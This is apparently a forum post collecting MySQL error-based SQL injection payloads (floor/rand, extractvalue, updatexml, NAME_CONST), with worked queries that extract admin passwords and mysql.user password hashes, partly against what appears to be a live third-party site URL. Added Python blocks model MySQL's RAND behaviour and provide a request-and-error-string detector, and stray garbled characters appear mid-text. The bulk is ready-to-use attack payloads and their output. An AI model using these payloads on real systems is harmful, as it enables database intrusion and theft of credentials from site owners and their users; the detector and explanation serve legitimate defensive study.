MySQL error-based injection: exploitation via the floor, ExtractValue and UpdateXml error modes

Original poster, posted 2015-11-11 19:03:37

1. Error via floor

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

Example:
First run a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error.

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is leaked in the error message. To retrieve other data, replace version() with the desired subquery.
For example, to retrieve the administrator user name and password:

Method1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id=1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
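As an added illustration (not code from the original post), the following Python model shows why this payload fails deterministically and why it needs at least three source rows: it reproduces MySQL's RAND(seed) generator (the my_rnd() linear congruential generator, seeded the way the server seeds RAND(0)) and models GROUP BY computing a non-deterministic key once to look up a group and again when inserting it. The prefix string standing in for version() is a constructed value.

```python
# Added illustration (not the original post's code): a model of MySQL's
# RAND(seed) generator (the my_rnd() LCG seeded as Item_func_rand does)
# and of GROUP BY evaluating a non-deterministic key twice, which is what
# turns floor(rand(0)*2) into ERROR 1062 'Duplicate entry ... group_key'.

MAX_VALUE = 0x3FFFFFFF


def mysql_rand(seed):
    """Yield the values MySQL's RAND(seed) produces, in order."""
    seed1 = (seed * 0x10001 + 55555555) % MAX_VALUE
    seed2 = (seed * 0x10000001) % MAX_VALUE
    while True:
        seed1 = (seed1 * 3 + seed2) % MAX_VALUE
        seed2 = (seed1 + seed2 + 33) % MAX_VALUE
        yield seed1 / MAX_VALUE


def floor_rand0_sequence(n):
    """First n values of floor(rand(0)*2): always 0, 1, 1, 0, 1, 1, ..."""
    gen = mysql_rand(0)
    return [int(next(gen) * 2) for _ in range(n)]


def simulate_group_by(row_count, prefix="5.1.33-community-log"):
    """Model GROUP BY concat(prefix, floor(rand(0)*2)) over row_count rows.

    MySQL computes the key once to probe the temporary table; when the group
    is new it computes the key AGAIN to insert the group row. With rand() in
    the key the probed and inserted values differ, so the insert can collide
    with a group created earlier. prefix stands in for version() (constructed).
    Returns ("ok", groups) or ("ERROR 1062", duplicate_key).
    """
    gen = mysql_rand(0)
    groups = {}
    for _ in range(row_count):
        probe = prefix + str(int(next(gen) * 2))
        if probe in groups:
            groups[probe] += 1                  # existing group: count it
            continue
        insert = prefix + str(int(next(gen) * 2))  # recomputed on insert
        if insert in groups:
            return "ERROR 1062", insert         # duplicate entry for group_key
        groups[insert] = 1
    return "ok", groups
```

With one or two source rows the query succeeds, which is why the payload groups over information_schema.tables rather than a possibly empty table.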

2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'

Further collected material:


http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

Error-based injection on newer MySQL versions: injection via NAME_CONST
It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

Background

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

|---------------|
|     TEST      |
|---------------|
|       1       |
|---------------|


http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--


VAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'

Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...
- T# K( q6 ~/ {! M3 A" O. s
Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
2 V9 l. G# K! [" V& n" p

We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'

Now let's get the tables out this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
Let's see if it works here, if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'
Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
And there we have it, thanks for reading.
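As an added defensive example (not code from the original post), the following Python detector flags the four request patterns covered in this thread (floor/rand group-by, extractvalue, updatexml and the doubled name_const) in URL parameters, and separately flags the MySQL error strings whose leakage into an HTTP response is what makes every one of these techniques work. The log lines and their 'status url' format are constructed for this example.

```python
# Added defensive example (not the original post's code): flag the request
# patterns this thread covers and the MySQL error strings that, when echoed
# in an HTTP response, give error-based injection its oracle.
import re
from urllib.parse import unquote_plus

REQUEST_SIGNATURES = {
    "floor_groupby": re.compile(
        r"floor\s*\(\s*rand\s*\(\s*\d*\s*\)\s*\*\s*2\s*\).*group\s+by", re.I | re.S),
    "extractvalue": re.compile(r"extractvalue\s*\(", re.I),
    "updatexml": re.compile(r"updatexml\s*\(", re.I),
    "name_const": re.compile(r"name_const\s*\(.*name_const\s*\(", re.I | re.S),
}
# What a leaking application shows the client for each technique.
RESPONSE_SIGNATURES = re.compile(
    r"Duplicate entry '.*' for key 'group_key'|XPATH syntax error|Duplicate column name",
    re.I)

def normalize(url):
    """Decode %xx and '+' twice so double-encoded parameters still match."""
    return unquote_plus(unquote_plus(url))

def classify_request(url):
    """Return the sorted signature names matching one request URL."""
    text = normalize(url)
    return sorted(n for n, rx in REQUEST_SIGNATURES.items() if rx.search(text))

def leaks_db_error(body):
    """True if a response body carries a MySQL error a client can read."""
    return RESPONSE_SIGNATURES.search(body) is not None

def scan_log(lines):
    """Lines use a constructed 'status url' format; returns (status, tags) hits."""
    hits = []
    for line in lines:
        status, url = line.split(" ", 1)
        tags = classify_request(url)
        if tags:
            hits.append((status, tags))
    return hits

# Constructed sample requests; payload shapes are the ones shown in the thread.
SAMPLE_LOG = [
    "200 /content/detail.php?id=330&sid=19&cid=261",
    "500 /content/detail.php?id=1+and+(select+1+from+(select+count(*),concat(version(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)",
    "500 /content/detail.php?id=1%20and%20extractvalue(1,concat(0x5c,(select%20user())))",
    "500 /content/detail.php?id=1+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--",
]
```

A 500 status paired with one of these tags, or any response matching leaks_db_error, is the pattern to alert on; the lasting fix is parameterised queries plus suppressing database error text in responses.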
